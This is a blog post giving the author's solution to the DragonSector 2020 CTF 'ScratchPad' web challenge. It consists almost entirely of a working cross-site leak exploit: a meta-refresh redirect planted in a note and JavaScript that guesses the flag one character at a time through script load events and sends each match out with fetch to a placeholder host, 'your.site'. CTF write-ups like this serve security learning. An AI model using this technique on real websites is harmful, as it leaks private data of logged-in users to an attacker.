<!DOCTYPE html><html lang="en"><head>
    
      <title>
        Solution for DragonSector 2020 CTF&#39;s ScratchPad challenge ::
        jorgectf — blog
      </title>
    
    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<meta name="description" content="Solution for DragonSector 2020 CTF&amp;rsquo;s ScratchPad challenge."/>
<meta name="keywords" content=""/>
<meta name="robots" content="noodp"/>
<link rel="canonical" href="https://jorgectf.github.io/blog/post/dragonsector-2020-scratchpad/"/>





<link rel="stylesheet" href="https://jorgectf.github.io/blog/assets/style.css"/>

<link rel="stylesheet" href="https://jorgectf.github.io/blog/style.css"/>


<link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://jorgectf.github.io/blog/img/apple-touch-icon-144-precomposed.png"/>
<link rel="shortcut icon" href="https://jorgectf.github.io/blog/img/favicon.png"/>


<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-Italic.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>
<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-Regular.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>
<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-Medium.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>
<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-MediumItalic.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>
<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-Bold.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>
<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-BoldItalic.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>


<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Solution for DragonSector 2020 CTF&#39;s ScratchPad challenge"/>
<meta name="twitter:description" content="Solution for DragonSector 2020 CTF’s ScratchPad challenge."/>



<meta property="og:title" content="Solution for DragonSector 2020 CTF&#39;s ScratchPad challenge"/>
<meta property="og:description" content="Solution for DragonSector 2020 CTF’s ScratchPad challenge."/>
<meta property="og:type" content="article"/>
<meta property="og:url" content="https://jorgectf.github.io/blog/post/dragonsector-2020-scratchpad/"/><meta property="article:section" content="post"/>
<meta property="article:published_time" content="2020-11-25T00:00:00+00:00"/>
<meta property="article:modified_time" content="2020-11-25T00:00:00+00:00"/><meta property="og:site_name" content="jorgectf"/>







  </head>
  <body class="dark-theme">
    <div class="container">
      <header class="header">
  <span class="header__inner">
    <a href="https://jorgectf.github.io/blog/" class="logo" style="text-decoration: none;">
  
  <img src="https://jorgectf.github.io/blog/logo.png" alt="jorgectf"/>
  
</a>
    <span class="header__right">
      
        <nav class="menu">
  <ul class="menu__inner menu__inner--desktop">
    
    
    
    <li><a href="https://jorgectf.gitbook.io/awae-oswe-preparation-resources/">OSWE Cheatsheet</a></li>
    
    
    
    <li><a href="https://jorgectf.github.io/blog/research/">Research</a></li>
    
    
    <li><a href="../">About</a></li>
    
    
  </ul>

  <ul class="menu__inner menu__inner--mobile">
    
    
    <li><a href="https://jorgectf.gitbook.io/awae-oswe-preparation-resources/">OSWE Cheatsheet</a></li>
    
    
    
    <li><a href="https://jorgectf.github.io/blog/research/">Research</a></li>
    
    
    <li><a href="https://jorgectf.github.io/blog/../">About</a></li>
  </ul>
</nav>
        <span class="menu-trigger">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
            <path d="M0 0h24v24H0z" fill="none"></path>
            <path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z"></path>
          </svg>
        </span>
      
      <span class="theme-toggle">
        <svg class="theme-toggler" width="24" height="24" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">
  <path d="M22 41C32.4934 41 41 32.4934 41 22C41 11.5066 32.4934 3 22
  3C11.5066 3 3 11.5066 3 22C3 32.4934 11.5066 41 22 41ZM7 22C7
  13.7157 13.7157 7 22 7V37C13.7157 37 7 30.2843 7 22Z"></path>
</svg>

      </span>
    </span>
  </span>
</header>


      <div class="content">
        
  
  

  <div class="post">
    <h1 class="post-title">Solution for DragonSector 2020 CTF’s ScratchPad challenge</h1>
    <div class="post-meta">
      
        <span class="post-date">
          2020-11-25
        </span>

        
          
        
      

      


      
    </div>

    
      <span class="post-tags">
        
          <a href="https://jorgectf.github.io/blog/tags/ctf/">#CTF</a> 
        
          <a href="https://jorgectf.github.io/blog/tags/dragonsector-ctf/">#DragonSector CTF</a> 
        
          <a href="https://jorgectf.github.io/blog/tags/web/">#Web</a> 
        
          <a href="https://jorgectf.github.io/blog/tags/html/">#HTML</a> 
        
          <a href="https://jorgectf.github.io/blog/tags/xsleak/">#XSLeak</a> 
        
      </span>
    

    

    <div class="post-content">
      
      <p>Context: <a href="https://twitter.com/jorge_ctf/status/1331686405068771330" target="_blank">tweet</a>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html"><span style="color:#75715e">&lt;!-- Note&#39;s content forcing a redirection in 0 seconds to the supplied URL --&gt;</span>
&lt;<span style="color:#f92672">meta</span> <span style="color:#a6e22e">http-equiv</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;refresh&#34;</span> <span style="color:#a6e22e">content</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;0; url=http://your.site/contentBelow&#34;</span>&gt;

<span style="color:#75715e">&lt;!-- Iterating over the alphabet to query a match (regex) to the iterated letter in order to wrap script&#39;s onload event (will be executed if the page is loaded correctly a.k.a no 404 status code) and append working letter to the &#39;known&#39; flag --&gt;</span>

&lt;<span style="color:#f92672">html</span>&gt;
    &lt;<span style="color:#f92672">body</span>&gt;
        &lt;<span style="color:#f92672">script</span>&gt;
            <span style="color:#66d9ef">let</span> <span style="color:#a6e22e">known</span> <span style="color:#f92672">=</span> encodeURIComponent(<span style="color:#e6db74">&#34;^DrgnS{NoSameSiteCookiesByDefault\\?!}$&#34;</span>);
            <span style="color:#66d9ef">let</span> <span style="color:#a6e22e">iterator</span> <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
            <span style="color:#66d9ef">let</span> <span style="color:#a6e22e">alphabet</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\&#34;!¡%&#39;(),-/:;&lt;=&gt;@[\\]_`{}~&#34;</span>.<span style="color:#a6e22e">split</span>(<span style="color:#e6db74">&#34;&#34;</span>);
            [<span style="color:#e6db74">&#34;\\.&#34;</span>,<span style="color:#e6db74">&#34;\\?&#34;</span>].<span style="color:#a6e22e">forEach</span>(<span style="color:#66d9ef">char</span> =&gt; <span style="color:#a6e22e">alphabet</span>.<span style="color:#a6e22e">push</span>(<span style="color:#66d9ef">char</span>))
            
            <span style="color:#a6e22e">setInterval</span>( <span style="color:#66d9ef">function</span>() {
                <span style="color:#a6e22e">letter</span> <span style="color:#f92672">=</span> encodeURIComponent(<span style="color:#a6e22e">alphabet</span>[<span style="color:#a6e22e">iterator</span>]);

                <span style="color:#75715e">// console.log(`Trying ${known}(${letter})`) // Debug locally
</span><span style="color:#75715e"></span>                <span style="color:#a6e22e">script</span> <span style="color:#f92672">=</span> document.<span style="color:#a6e22e">createElement</span>(<span style="color:#e6db74">&#39;script&#39;</span>)
                <span style="color:#a6e22e">script</span>.<span style="color:#a6e22e">src</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">`http://scratchpad.hackable.software:3000/notes?q=</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">known</span><span style="color:#f92672">+</span><span style="color:#a6e22e">letter</span><span style="color:#e6db74">}</span><span style="color:#e6db74">`</span>
                
                <span style="color:#a6e22e">script</span>.<span style="color:#a6e22e">onload</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">function</span>() {
                    <span style="color:#a6e22e">fetch</span>(<span style="color:#e6db74">`http://your.site/working/</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">known</span><span style="color:#f92672">+</span><span style="color:#a6e22e">letter</span><span style="color:#e6db74">}</span><span style="color:#e6db74">`</span>, {<span style="color:#a6e22e">mode</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#39;no-cors&#39;</span>}) <span style="color:#75715e">// - GET /WORKING/^DrgnS{NoSameSiteCookiesByDefault\?!}$
</span><span style="color:#75715e"></span>                    <span style="color:#75715e">// console.log(`Found ${known}(${letter})`) // Debug locally
</span><span style="color:#75715e"></span>                    <span style="color:#a6e22e">known</span> <span style="color:#f92672">+=</span> <span style="color:#a6e22e">letter</span>;
                }
                <span style="color:#75715e">/* script.onerror = function() {
</span><span style="color:#75715e">                    fetch(`http://your.site/no/${known+letter}`, {mode: &#39;no-cors&#39;})
</span><span style="color:#75715e">                    // console.log(`Not Working ${known}(${letter})`) // Debug locally
</span><span style="color:#75715e">                } // Debug */</span>
                
                document.<span style="color:#a6e22e">body</span>.<span style="color:#a6e22e">appendChild</span>(<span style="color:#a6e22e">script</span>)

                <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">iterator</span> <span style="color:#f92672">===</span> <span style="color:#a6e22e">alphabet</span>.<span style="color:#a6e22e">length</span> <span style="color:#f92672">-</span> <span style="color:#ae81ff">1</span>) {
                    <span style="color:#a6e22e">iterator</span> <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
                } <span style="color:#66d9ef">else</span> {  
                    <span style="color:#a6e22e">iterator</span> <span style="color:#f92672">+=</span> <span style="color:#ae81ff">1</span>;
                }
            }, <span style="color:#ae81ff">150</span>); <span style="color:#75715e">// Wait not to break the navigator (selenium&#39;s firefox in this case)
</span><span style="color:#75715e"></span>
        &lt;/<span style="color:#f92672">script</span>&gt;
    &lt;/<span style="color:#f92672">body</span>&gt;
&lt;/<span style="color:#f92672">html</span>&gt;

<span style="color:#75715e">&lt;!-- I would like to thank Manuel Sousa (@manuelvsousa) for pointing me to his amazing XS leaks wiki (https://xsleaks.com) made along with awesome Google&#39;s engineers :D --&gt;</span> 
</code></pre></div>
    </div>
    
      
        <div class="pagination">
          <div class="pagination__title">
            <span class="pagination__title-h">Read other posts</span>
            <hr/>
          </div>
          <div class="pagination__buttons">
            
              <span class="button previous">
                <a href="https://jorgectf.github.io/blog/post/defcamp-2020/">
                  <span class="button__icon">←</span>
                  <span class="button__text">Solution for some DefCamp 2020 CTF&#39;s Web challenges</span>
                </a>
              </span>
            
            
              <span class="button next">
                <a href="https://jorgectf.github.io/blog/post/inctf-gosqlv3/">
                  <span class="button__text">Solving InCTF&#39;s GoSQLv3.</span>
                  <span class="button__icon">→</span>
                </a>
              </span>
            
          </div>
        </div>
      
    

    
      
        

<script src="https://unpkg.com/shiki"></script>

<script>
    if (document.querySelector("code[data-lang*='ql']")) {
        shiki
            .getHighlighter({
                theme: 'github-dark',
                langs: [
                    {
                        id: 'codeql',
                        scopeName: 'source.ql',
                        path: '/languages/codeql.tmLanguage.json',
                        samplePath: 'codeql.sample',
                        aliases: ['ql']
                    }
                ]
            })
            .then(highlighter => {
                for (codeElement of document.querySelectorAll("code[data-lang]")) {
                    try {
                        let prev = codeElement.textContent
                        let code = highlighter.codeToHtml(prev, { lang: codeElement.dataset.lang.toString() })
                        codeElement.parentNode.innerHTML = code
                    } catch(err) {
                        console.log(err)
                    }
                }
                for (shikiElement of document.querySelectorAll("pre[class='shiki']")) {
                    shikiElement.parentNode.parentNode.replaceChild(
                        shikiElement, shikiElement.parentNode
                    )
                }
            })
    }
</script>
      
    
  </div>

      </div>

      
        <footer class="footer">
  <div class="footer__inner">
    
      <a href="https://jorgectf.github.io/blog/" class="logo" style="text-decoration: none;">
  
  <img src="https://jorgectf.github.io/blog/logo.png" alt="jorgectf"/>
  
</a>
      <div class="copyright">
        <span>© 2022 Powered by
          <a href="https://gohugo.io" target="_blank" rel="noopener">Hugo</a></span>
        <span>Theme created by
          <a href="https://twitter.com/panr" target="_blank" rel="noopener">panr</a></span>
      </div>
    
  </div>
</footer>

<script src="https://jorgectf.github.io/blog/assets/main.js"></script>


      
    </div>

    
  

</body></html>